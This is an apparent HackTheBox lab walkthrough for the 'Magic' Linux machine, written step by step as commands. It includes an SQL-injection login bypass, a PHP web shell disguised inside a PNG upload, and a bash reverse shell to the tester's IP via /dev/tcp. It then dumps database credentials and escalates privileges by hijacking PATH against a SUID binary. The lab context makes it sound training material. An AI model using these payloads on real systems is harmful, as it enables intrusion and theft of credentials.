Magic

Magic is a Medium rated difficulty Linux machine from HackTheBox created by TRX. This machine is well designed, is not complex and you don’t have to search from every corner of the machine for some clues. In the current post my IP is 10.10.14.18 and the target’s IP is 10.129.44.173

Gather Information

First of all, let’s start with a basic scan.

Local Terminal

nmap -p- --open -T5 -v -n 10.129.44.173

Local Terminal

nmap -sC -sV -p 22,80 10.129.44.173 -oN Target

Local Terminal

whatweb http://10.129.44.173

Browser: http://10.129.44.173

Browser: http://10.129.44.173/login.php

Here we are going to try 2 login combinations, a default password and an SQL Injection, {admin : admin} and {admin : ' or 1=1 -- -}. With the second one you will be in.

Browser: http://10.129.44.173/upload.php

Exploitation

We can upload files and we know the directory /images/uploads/ to visit the image alone (You can test it if you want), so first we will try to upload a PHP file.

Local Terminal

vi test.php

Content of vi.php

<?php
	echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
?>

With that utility, by writing test.php?cmd={Command} at the end of the URL in the location of the file, we will be able to enter to the machine.

Browser: {Upload test.php}

By the magic numbers, the file is recognized as a PHP Script file, with knowing this, we will modify a PNG file and add the code.

Browser: {search and download a png file}

Local Terminal

mv downloaded.png downloaded.php.png
vi downloaded.php.png

Browser: {upload downloaded.php.png}

Browser: http://10.129.44.173/images/uploads/downloaded.php.png?cmd=whoami

So, now we are going to login to the shell, for this we need a local Terminal [Term] and the browser.

Local Terminal

nc -nlvp 443

Browser: http://10.129.44.173/images/uploads/downloaded.php.png?cmd=bash -c ‘bash -i >%26 /dev/tcp/10.10.14.18/443 0>%261’
- Remember: To use commands at URLs, your ‘&’ are ‘%26’ (URL Encoding)

Ok, we have to find a way to become the user Theseus, our first option is to explore the files of the website.

Target Terminal [www-data]

cd /var/www/Magic
ls

Target Terminal [www-data]

cat db.php5

Local Terminal

ssh theseus@10.129.44.173        #Fails

Target Terminal [www-data]

su theseus                       #Fails

Target Terminal [www-data]

mysql

Target Terminal [www-data]

mysql     #press TAB

Target Terminal [www-data]

mysqlshow -u theseus -piamkingtheseus
mysqlshow -u theseus -piamkingtheseus Magic
mysqlshow -u theseus -piamkingtheseus Magic login

Target Terminal [www-data]

mysqldump -utheseus -piamkingtheseus Magic

Target Terminal [www-data]

su theseus                   #Pass: Th3s3usW4sK1ng

Target Terminal [Theseus]

cat /home/theseus/user.txt

Privileges Escalation

Target Terminal [Theseus]

cd /
id
sudo -l

Target Terminal [Theseus]

find \-perm -4000 2>/dev/null

Target Terminal [Theseus]

ls -l ./bin/sysinfo

We need to know how the command sysinfo works, by using string we can explore the whole command

Target Terminal [Theseus]

strings ./bin/sysinfo

So, we have to find from where ($PATH) found the command and change the path priority o execute a non-dangerous fdisk file.

Target Terminal [Theseus]

which fdisk
echo $PATH

Now we are going to create a new fdisk and change the PATH to read ours.

Target Terminal [Theseus]

cd /tmp/
touch fdisk
chmod +x fdisk
export PATH=/tmp:$PATH               #check at echo $PATH
which fdisk

Target Terminal [Theseus]

nano /tmp/fdisk

Content of fdisk

chmod u+s /bin/bash

Target Terminal [Theseus]

bash -p

Target Terminal [Root]

cd /root/
cat root.txt

PreviousLightweight NextTenten

Last updated 2 years ago